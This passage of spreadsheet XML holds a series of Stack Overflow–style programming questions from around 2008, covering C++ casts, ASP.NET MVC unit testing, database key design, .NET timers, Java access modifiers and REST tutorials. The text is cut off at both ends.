    <t xml:space="preserve">&lt;p&gt;What are the proper uses of:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;static_cast&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;dynamic_cast&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;const_cast&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;reinterpret_cast&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;C-style cast &lt;code&gt;(type)value&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Function-style cast &lt;code&gt;type(value)&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;How does one decide which to use in which specific cases?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How new programming frameworks help analysts, designers and programmers better work together?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It may be Water fall, iterative or agile development or anything else. No matter what development lifecycle mode we talk about there always several perspectives for same problem. From business to problem oriented and further to programming, testing, etc.&lt;/p&gt;
&lt;p&gt;So question is how are modern companies use modern advanced methodologies to translate requirements to source code?&lt;/p&gt;
&lt;p&gt;How new programming frameworks help analysts, designers and programmers better work together?&lt;/p&gt;
&lt;p&gt;New means those which most actively used nowadays. Python or PHP are not quit new but they have actively developing crowd of funs and specialists. Workflow foundation, AJAX, F# etc quite new and give extra productivity developers. But how they impact productivity of a team?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I Unit Test Actions without Mocking that use UpdateModel?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been working my way through Scott Guthrie's excellent post on &lt;a href="http://weblogs.asp.net/scottgu/archive/2008/10/16/asp-net-mvc-beta-released.aspx"&gt;ASP.NET MVC Beta 1&lt;/a&gt;.  In it he shows the improvements made to the UpdateModel method and how they improve unit testing.  I have recreated a similar project however anytime I run a UnitTest that contains a call to UpdateModel I receive an ArgumentNullException naming the controllerContext parameter.&lt;/p&gt;
&lt;p&gt;Here's the relevant bits, starting with my model:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class Country {
  public Int32 ID { get; set; }
  public String Name { get; set; }
  public String Iso3166 { get; set; }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The controller action:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[AcceptVerbs(HttpVerbs.Post)]
public ActionResult Edit(Int32 id, FormCollection form)
{
  using ( ModelBindingDataContext db = new ModelBindingDataContext() ) {
    Country country = db.Countries.Where(c =&amp;gt; c.CountryID == id).SingleOrDefault();
    try {
      UpdateModel(country, form);
      db.SubmitChanges();
      return RedirectToAction("Index");
    }
    catch {
      return View(country);
    }
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And finally my unit test that's failing:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[TestMethod]
public void Edit()
{
  CountryController controller = new CountryController();
  FormCollection form = new FormCollection();
  form.Add("Name", "Canada");
  form.Add("Iso3166", "CA");
  var result = controller.Edit(2 /*Canada*/, form) as RedirectToRouteResult;
  Assert.IsNotNull(result, "Expected to be redirected on successful POST.");
  Assert.AreEqual("Show", result.RouteName, "Expected to redirect to the View action.");
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;ArgumentNullException&lt;/code&gt; is thrown by the call to &lt;code&gt;UpdateModel&lt;/code&gt; with the message "Value cannot be null. Parameter name: controllerContext".  I'm assuming that somewhere the &lt;code&gt;UpdateModel&lt;/code&gt; requires the &lt;code&gt;System.Web.Mvc.ControllerContext&lt;/code&gt; which isn't present during execution of the test.&lt;/p&gt;
&lt;p&gt;I'm also assuming that I'm doing something wrong somewhere and just need to pointed in the right direction.&lt;/p&gt;
&lt;p&gt;Help Please!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>iPhone video buffer</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to build a video recorder without jailbreaking my iPhone (i've a Developer license).
I began using PhotoLibrary private framework, but i can only reach 2ftp (too slow).
Cycoder app have a fps of 15, i think it uses a different approach.
I tried to create a bitmap from the previewView of the CameraController, but it always returns e black bitmap.&lt;/p&gt;
&lt;p&gt;I wonder if there's a way to directly access the video buffer, maybe with IOKit framework.&lt;/p&gt;
&lt;p&gt;Thanks
Marco&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a service which will let me create a snippet of a webpage</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for a way to get the essence or the most important aspect of a webpage? If I provide a URL, is there any external service which can accomplish this? I am not looking for snap.com like service as it provides a snapshot.&lt;/p&gt;
&lt;p&gt;I might be willing to even implement such a system on my own. For beginning I do not want to put excessive effort, but rather would love to able to get some basic results. Are there any thoughts on how I may approach this problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a REAL performance difference between INT and VARCHAR primary keys?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a measurable performance difference between using INT vs. VARCHAR as a primary key in MySQL? I'd like to use VARCHAR as the primary key for reference lists (think US States, Country Codes) and a coworker won't budge on the INT AUTO_INCREMENT as a primary key for all tables. &lt;/p&gt;
&lt;p&gt;My argument, as detailed &lt;a href="http://database-programmer.blogspot.com/2008/01/database-skills-sane-approach-to.html#rule1"&gt;here&lt;/a&gt;, is that the performance difference between INT and VARCHAR is negligible, since every INT foreign key reference will require a JOIN to make sense of the reference, a VARCHAR key will directly present the information.&lt;/p&gt;
&lt;p&gt;So, does anyone have experience with this particular use-case and the performance concerns associated with it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you organize C# code in to files?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In C#, the questions of what types to create, what members they should have, and what namespaces should hold them, are questions of OO design.  They are not the questions I'm interested in here.&lt;/p&gt;
&lt;p&gt;Instead, I want to ask how you store these in disk artifacts.  Here are some example rules:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Put all of an assembly's types in a single source file.  One friend who did this said "files are an archiac code organization tool; today I use classview and Collapse to Definitions to browse my code".&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Put all your code in one assembly.  Makes deployment &amp;amp; versioning simpler.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Directory structure reflects namespace structure.  &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Each namespace gets its own assembly.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Each type goes in its own assembly.  (Listed as an extreme example.)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Each type gets its own source file.  &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Each member gets its own file; each type gets its own directory.  (Listed as an extreme example.)&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Is it possible to Serialize a LINQ object?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to serialize some LINQ generated objects and store them in a table as a binary field (Never you mind why). I'd like to be able to write some code that looks something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SerialTestDataContext db = new SerialTestDataContext();
relation_table row = db.relation_tables.First();
MemoryStream memStream = new MemoryStream();
BinaryFormatter bin = new BinaryFormatter();
bin.Serialize(memStream, row);
Console.WriteLine("Serilized successfully");
TestTable tt = new testTable();
tt.data = new System.Data.Linq.Binary(memStream.ToArray());
db.testTables.InsertOnSubmit(tt);
db.SubmitChanges();
Console.WriteLine("Inserted successfully");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Currently that fails even though I've marked the generated classes as [Serializable] because one of the LINQ inherited classes is not. Is it even possible to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQLite .dump command from SQLiteConnection object</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Using SQLite from .net, Is there a way to access the &lt;code&gt;.dump&lt;/code&gt; command or something equivalent from the SQLiteConnection class?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>non-member non-friend function syntax</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is their a way to use a non-member non-friend function on an object using the same "dot" notation as member functions?&lt;/p&gt;
&lt;p&gt;Can I pull a (any) member out of a class, and have users use it in the same way they always have?&lt;/p&gt;
&lt;p&gt;Longer Explanation:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.ddj.com/cpp/184401197" rel="nofollow"&gt;Scott Meyers&lt;/a&gt;, Herb Sutter, et all, argue that non-member non-friend functions are a part of an object's interface, and can improve encapsulation.  I agree with them.&lt;/p&gt;
&lt;p&gt;However, after recently reading this article: &lt;a href="http://www.gotw.ca/gotw/084.htm" rel="nofollow"&gt;http://www.gotw.ca/gotw/084.htm&lt;/a&gt; I find myself questioning the syntax implications.&lt;/p&gt;
&lt;p&gt;In that article, Herb proposes having a single &lt;code&gt;insert&lt;/code&gt;, &lt;code&gt;erase&lt;/code&gt;, and &lt;code&gt;replace&lt;/code&gt; member, and several non-member non-friend functions of the same name.&lt;/p&gt;
&lt;p&gt;Does this mean, as I think it does, that Herb thinks some functions should be used with the dot notation, and others as a global function?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;std::string s("foobar");
s.insert( ... ); /* One like this */
insert( s , ...); /* Others like this */
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Edit:&lt;/p&gt;
&lt;p&gt;Thanks everyone for your very useful answers, however, I think the point of my question has been overlooked.&lt;/p&gt;
&lt;p&gt;I specifically did not mention the specific case of operators, and how they retain the "natural" notation.  Nor that you should wrap everything in a namespace.  These things are written in the article I linked to.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The question itself was:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;In the article, Herb suggests that one insert() method be a member, while the rest are non-member non-friend functions.&lt;/p&gt;
&lt;p&gt;This implies that to use one form of insert() you have to use dot notation, while for the others, you do not.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Is it just me, or does that sound crazy?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I have a hunch that perhaps you can use a single syntax.  (Im thinking how Boost::function can take a *this parameter for mem_fun).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Msg 64, Level 20, State 0, Line 0 SQL Server Error</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am running a sproc on an SQL Server 2005 server which is resulting in the following error:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Msg 64, Level 20, State 0, Line 0 A
  transport-level error has occurred
  when receiving results from the
  server. (provider: TCP Provider,
  error: 0 - The specified network name
  is no longer available.)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Once the error occurs I loose my connection to the server, but able to reconnect.&lt;br&gt;
There is nothing in the Event logs.
The database is still functional and running its website fine.&lt;br&gt;
EDIT: This occurs every time I run this sproc, or it's called by an application.&lt;/p&gt;
&lt;p&gt;Any suggestions on what may be causing this error?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Generating large sets of random data vb6/vb net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there an easy way in either language to generate a large set of random data quickly so far all the functions I've tried haven't worked too well when I need to generate a group of say 500,000 characters :(  Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>"Atomically" changing a System.Threading.Timer</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let's say I have an existing System.Threading.Timer instance and I'd like to call Change on it to push it's firing time back:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var timer = new Timer(DelayCallback, null, 10000, Timeout.Infinite);
// ... (sometime later but before DelayCallback has executed)
timer.Change(20000, Timeout.Infinite);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm using this timer to perform an "idle callback" after a period of no activity. ("Idle" and "no activity" are application-defined conditions in this case...the specifics aren't terribly important.) Every time I perform an "action", I want to reset the timer so that it is always set to fire 10 seconds after that.&lt;/p&gt;
&lt;p&gt;However, there is an inherent race condition because when I call Change, I can't tell if the Timer has already fired based on its old settings. (I can, of course, tell if my callback has happened but I can't tell if the CLR's internal timer thread has queued my callback to the threadpool and its execution is imminent.)&lt;/p&gt;
&lt;p&gt;Now I know I can call Dispose on the timer instance and re-create it each time I need to "push it back".  but this &lt;em&gt;seems&lt;/em&gt; less efficient than just changing the existing timer. Of course it &lt;em&gt;may&lt;/em&gt; not be...I'll run some micro-benchmarks in a bit and let you all know.&lt;/p&gt;
&lt;p&gt;Alternatively, I can always keep track of the expected firing time (via DateTime.Now.AddSeconds(10)) and, if the original Timer fires, ignore it by checking DateTime.Now in the callback. (I have a nagging concern that this may not be 100% reliable on account of the Timer using TimeSpan and my check using DateTime...this may not be an issue but I'm not completely comfortable with it for some reason...)&lt;/p&gt;
&lt;p&gt;My questions are:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Is there a good way for me to call Timer.Change and be able to know whether I managed to change it before the callback was queued to the threadpool? (I don't think so, but it doesn't hurt to ask...)&lt;/li&gt;
&lt;li&gt;Has anyone else implemented (what I term) a "pushback timer" like this? If so, I'd love to hear how you tackled the problem.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;This question is somewhat hypothetical in nature since I already have a couple of working solutions (based on Dispose and based on DateTime.Now)...I'm mainly interested in hearing performance-related suggestions (as I'll be "pushing back" the Timer VERY frequently).&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>simple linq to sql has no supported translation to SQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i have this in my BlogRepository&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public IQueryable&amp;lt;Subnus.MVC.Data.Model.Post&amp;gt; GetPosts()
    {
        var query = from p in db.Posts
                    let categories = GetCategoriesByPostId(p.PostId)
                    let comments = GetCommentsByPostId(p.PostId)
                    select new Subnus.MVC.Data.Model.Post
                    {
                        Categories = new LazyList&amp;lt;Category&amp;gt;(categories),
                        Comments = new LazyList&amp;lt;Comment&amp;gt;(comments),
                        PostId = p.PostId,
                        Slug = p.Slug,
                        Title = p.Title,
                        CreatedBy = p.CreatedBy,
                        CreatedOn = p.CreatedOn,
                        Body = p.Body
                    };
        return query;
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public IQueryable&amp;lt;Subnus.MVC.Data.Model.Comment&amp;gt; GetCommentsByPostId(int postId)
    {
        var query = from c in db.Comments
                    where c.PostId == postId
                    select new Subnus.MVC.Data.Model.Comment
                    {
                        Body = c.Body,
                        EMail = c.EMail,
                        Date = c.CreatedOn,
                        WebSite = c.Website,
                        Name = c.Name
                    };
        return query;
    }
private IQueryable&amp;lt;Subnus.MVC.Data.Model.Category&amp;gt; GetCategoriesByPostId(int postId)
    {
        var query = from c in db.Categories
                    join pcm in db.Post_Category_Maps on c.CategoryId equals pcm.CategoryId
                    where pcm.PostId == postId
                    select new Subnus.MVC.Data.Model.Category
                    {
                        CategoryId = c.CategoryId,
                        Name = c.Name
                    };
        return query;
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and when i aplly this filter  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;namespace Subnus.MVC.Data
{
 public static class BlogFilters
 {
    public static IQueryable&amp;lt;Post&amp;gt; WherePublicIs(this IQueryable&amp;lt;Post&amp;gt; qry,bool state)
    {
        return from p in qry
               where p.IsPublic == state
               select p;
    }
 }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;}&lt;/p&gt;
&lt;p&gt;all this is in the same namespace if that help namespace Subnus.MVC.Data&lt;/p&gt;
&lt;p&gt;when i try to do this  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class BlogService : IBlogService
{
...
    public IList&amp;lt;Post&amp;gt; GetPublicPosts()
    {
         return repository.GetPosts().WherePublicIs(true).ToList();
    }
 ...
 }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;that is in the namespace Subnus.MVC.Service
it throws the error  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Method 'System.Linq.IQueryable`1[Subnus.MVC.Data.Model.Comment] GetCommentsByPostId(Int32)' has no supported translation to SQL.
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>I'm looking for a way to search the values in a .net hashtable using wildcards</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a whole host of values stored in a .net 2.0 hashtable.  What I would really like to find is a way to, essentially, do a SQL select statement  on the table.&lt;/p&gt;
&lt;p&gt;Meaning, I'd like to get a list of keys whose associated values match a very simple text pattern (along the lines of "starts with a number".)&lt;/p&gt;
&lt;p&gt;The final goal will be to remove these records from the hashtable for further processing.&lt;/p&gt;
&lt;p&gt;I've been beating my head against this for a while now, and I can't seem to come up with anything.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
&lt;p&gt;(On the off chance this matters: due to the realities of this project, any 3rd party widgets or upgrading to a more recent version of .net are off the table.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Ping a site in ruby?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What replacements are available for pinging an ip address in Ruby? The stdlib "ping" library seems to be pretty limited in functionality. I'm not interested in rolling my own code here. Are there good gems available? Should I just suck it up and live with it?&lt;/p&gt;
&lt;p&gt;(I'm coding in Ruby 1.8.6 on Linux)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Useful regular expression tutorial</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a good tutorial on using regular expressions, especially with &lt;a href="http://en.wikipedia.org/wiki/Grep" rel="nofollow"&gt;grep&lt;/a&gt;? I tried googling for some, but most tutorials are too basic and cover things I already know.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>VB.NET Extension Methods</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;when I apply the tag  above my methods I get the error &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Type System.Runtime.CompilerServices.Extension is not defined.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Here is my sample&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;System.Runtime.CompilerServices.Extension()&amp;gt; _
     Public Sub test()
End Sub
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Where am I going wrong?&lt;/p&gt;
&lt;p&gt;Edit ~ Straight from the MSDN Article &lt;a href="http://msdn.microsoft.com/en-us/library/bb384936.aspx"&gt;here&lt;/a&gt;, the same error&lt;/p&gt;
&lt;p&gt;&lt;code&gt;&lt;/p&gt;
&lt;pre&gt;
Imports System.Runtime.CompilerServices
Module StringExtensions
     _
  Public Sub Print(ByVal aString As String)
        Console.WriteLine(aString)
    End Sub
End Module
&lt;/pre&gt;
&lt;p&gt;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I am using Visual Studio 2008 and 3.5 Framework in my project.&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Solution ~ The project was on 2.0 Framework. Changed to 3.5 and it works.&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>Java Protected Access Not Working</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In java, there's three levels of access:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Public - Open to the world&lt;/li&gt;
&lt;li&gt;Private - Open only to the class &lt;/li&gt;
&lt;li&gt;Protected - Open only to the class and its subclasses (inheritance).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So why does the java compiler allow this to happen?&lt;/p&gt;
&lt;p&gt;TestBlah.java:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class TestBlah {
    public static void main(String[] args) {
        Blah a = new Blah("Blah");
        Bloo b = new Bloo("Bloo");
        System.out.println(a.getMessage());
        System.out.println(b.getMessage()); //Works
        System.out.println(a.testing);
        System.out.println(b.testing); //Works
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Blah.java:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class Blah {
    protected String message;
    public Blah(String msg) {
        this.message = msg;
    }
    protected String getMessage(){
        return(this.message);
    }   
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Bloo.java:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class Bloo extends Blah {
    public Bloo(String testing) {
        super(testing);
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Is there a graceful way to stop svnserve -d</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for something like: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;svnserve stop
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Open source or free financial analysis programs/libraries</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for something containing similar functions to Matlabâ€™s financial and financial derivatives toolbox but donâ€™t have the cash to spend on matlab. I would appreciate any info on free or open source libraries or programs that will let me easily calculate interest rates, risk etc.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Build Tar file from directory in PHP without exec/passthru</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I have a client who's current host does not allow me to use tar via exec()/passthru()/ect and I need to backup the site periodicly and programmaticly so is there a solution?&lt;/p&gt;
&lt;p&gt;This is a linux server.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Singleton vs Static Class for exposing data read from xml</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a PageRoles xml file which contains the page path and the user role that can access that page.&lt;/p&gt;
&lt;p&gt;We are maintaining a Dictionary in a static class, which gets loaded int static constructor for the class.
The class has a method CheckIfRoleAllowed that takes in a page path and returns a bool.&lt;/p&gt;
&lt;p&gt;Each page call the CheckIfRoleAllowed on Page Init.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static class PageAccessChecker
{
 static Dictionary&amp;lt;string, UserRoleType[]&amp;gt; _PageAccessPermissions;
 static FileSystemWatcher _XmlWatcher;
 static PageAccessChecker()
 {
   // Load page access permissions from xml
   // Set FileSystemWatcher watcher to watch for changes
 }
 public static CheckIfRoleAllowed(string pagePath)
 {
 }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Would we be better off doing this using the singleton pattern?
If yes, why?&lt;/p&gt;
&lt;p&gt;Kind regards.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Parallelization: What causes Java threads to block other than synchronization &amp; I/O?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Short version is in the title.&lt;/p&gt;
&lt;p&gt;Long version:
I am working on a program for scientific optimization using Java.  The workload of the program can be divided into parallel and serial phases -- parallel phases meaning that highly parallelizable work is being performed.  To speed up the program (it runs for hours/days) I create a number of threads equal to the number of CPU cores on the machine I'm using -- typically 4 or 8 -- and divide the work between them.  I then start these threads and join() them before proceeding to a serial phase.&lt;/p&gt;
&lt;p&gt;So far so good.  What's bothering me is that the CPU utilization and speedup of the parallel phases is nowhere near the "theoretical maximum" -- e.g. if I have 4 cores, I expect to see somewhere between 350-400% "utilization" (as reported by top) but instead it bounces around between 180 and about 310. Using only a single thread, I get 100% CPU utilization.&lt;/p&gt;
&lt;p&gt;The only reasons I know of for threads not to run at full speed are:
    -blocking due to I/O
    -blocking due to synchronization&lt;/p&gt;
&lt;p&gt;No I/O whatsoever is going on in my parallel threads, nor any synchronization -- the only data structures shared by the threads are read-only, and are either basic types or (non-concurrent) collections.  So I'm looking for other explanations.  One possibility would be that several threads are repeatedly blocking for garbage collection, but that would only seem to make sense in a situation with memory pressure, and I am allocating well above the required maximum heap space.  &lt;/p&gt;
&lt;p&gt;Any suggestions would be appreciated.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Update:&lt;/b&gt; Just in case anyone is curious, after some more investigation I tweaked the code for general performance and am seeing better utilization, even though nothing I changed has to do with synchronization.  However, some of the changes should have resulted in fewer new heap allocations in particular I got rid of some use of &lt;b&gt;iterators&lt;/b&gt; and &lt;b&gt;termporary boxed numbers&lt;/b&gt; (The CERN "Colt" library for high-performance Java computing was useful here: it provides collections like IntArrayList, DoubleArrayList etc for basic types.).  So I think garbage collection was probably the culprit.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Implementing a search page using url parameters in ASP.NET and ASP.NET MVC</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let's say I have a search page called Search.aspx that takes a search string as a url parameter ala Google (e.g. Search.aspx?q=This+is+my+search+string).&lt;/p&gt;
&lt;p&gt;Currently, I have an asp:TextBox and an asp:Button on my page.  I'm handling the button's OnClick event and redirecting in the codebehind file to Search.aspx?q=
&lt;p&gt;What about with ASP.NET MVC when you don't have a codebehind to redirect with?  Would you create a GET form element instead that would post to Search.aspx?  Or would you handle the redirect in some other manner (e.g. jQuery event attached to the button)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to design a simple C++ object factory?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my application, there are 10-20 classes that are instantiated once[*]. Here's an example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class SomeOtherManager;
class SomeManagerClass {
public:
    SomeManagerClass(SomeOtherManager*);
    virtual void someMethod1();
    virtual void someMethod2();
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Instances of the classes are contained in one object:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class TheManager {
public:
    virtual SomeManagerClass* someManagerClass() const;
    virtual SomeOtherManager* someOtherManager() const;
    /** More objects... up to 10-20 */
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Currently TheManager uses the &lt;em&gt;new&lt;/em&gt; operator in order to create objects. &lt;/p&gt;
&lt;p&gt;My intention is to be able to replace, using plugins, the SomeManagerClass (or any other class) implementation with another one. In order to replace the implementation, 2 steps are needed:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Define a class DerivedSomeManagerClass, which inherits SomeManagerClass [plugin]&lt;/li&gt;
&lt;li&gt;Create the new class (DerivedSomeManagerClass) instead of the default (SomeManagerClass) [application]&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I guess I need some kind of object factory, but it should be fairly simple since there's always only one type to create (the default implementation or the user implementation).&lt;/p&gt;
&lt;p&gt;Any idea about how to design a simple factory like I just described? Consider the fact that there might be more classes in the future, so it should be easy to extend.&lt;/p&gt;
&lt;p&gt;[*] I don't care if it happens more than once.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; Please note that there are more than two objects that are contained in TheManager.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Detecting mouse double-click in Flash (AS2)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to detect mouse double-click on a button object using ActionScript 2.0? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best Practice for Designing User Roles and Permission System?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to add user roles and permission system into my web application built using PHP/MySQL. I want to have this functionality: &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;One root user can create sub-roots, groups, rules and normal users( all privileges) .&lt;/li&gt;
&lt;li&gt;Sub-roots can create only rules, permissions and users for his/her own group ( no groups).&lt;/li&gt;
&lt;li&gt;A user can access either content created by him or his group, based on the permission assigned to him, by group root.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I need the system to be flexible enough, so that new roles and permissions are assigned to content.&lt;/p&gt;
&lt;p&gt;I have a &lt;code&gt;users&lt;/code&gt; table storing group key along with other information. Currently I am using two feilds in each content table i.e. &lt;code&gt;createdBy&lt;/code&gt; and &lt;code&gt;CreatedByGroup&lt;/code&gt;, and using that as the point whether a certain user has permissions. But its not flexible enough, because for every new content, I have to go throug all data updates and permission updates. Please help me by discussing your best practices for schema design.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Symbian S60 - Scrolling text in a CEikLabel</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a single line CEikLabel in my application that needs to scroll text.&lt;/p&gt;
&lt;p&gt;The simple solution that comes to mind (but possibly naive) would be something like..&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[begin pseduo code]
 on timer.fire {
  set slightly shifted text in label
  redraw label
 }
 start timer
[end pseudo code]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Using a CPeriodic class as the timer and label.DrawDeferred() on each update.&lt;/p&gt;
&lt;p&gt;Do you think this is the best way, it may be rather inefficient redrawing the label two or three times a second.. but is there any other way?&lt;/p&gt;
&lt;p&gt;Thanks :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Any easy REST tutorials for Java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Every tutorial or explanation of REST just goes too complicated too quickly - the learning curve rises so fast after the initial explanation of CRUD and the supposed simplicity over SOAP.  Why can't people write decent tutorials anymore!&lt;/p&gt;
&lt;p&gt;I'm looking at Restlet - and its not the best, there are things missing in the tutorial and the language/grammar is a bit confusing and unclear.  It has took me hours to untangle their First Steps tutorial (with the help of another Java programmer!)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;RESTlet Tutorial Comments&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Overall I'm not sure exactly who the tutorial was aimed at - because there is a fair degree of assumed knowledge all round, so coming into REST and Restlet framework cold leaves you with a lot of 'catchup work' to do, and re-reading paragraphs over and over again.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;We had difficulty working out that the jars had to be in copied into the correct lib folder. &lt;/p&gt;&lt;/li&gt;
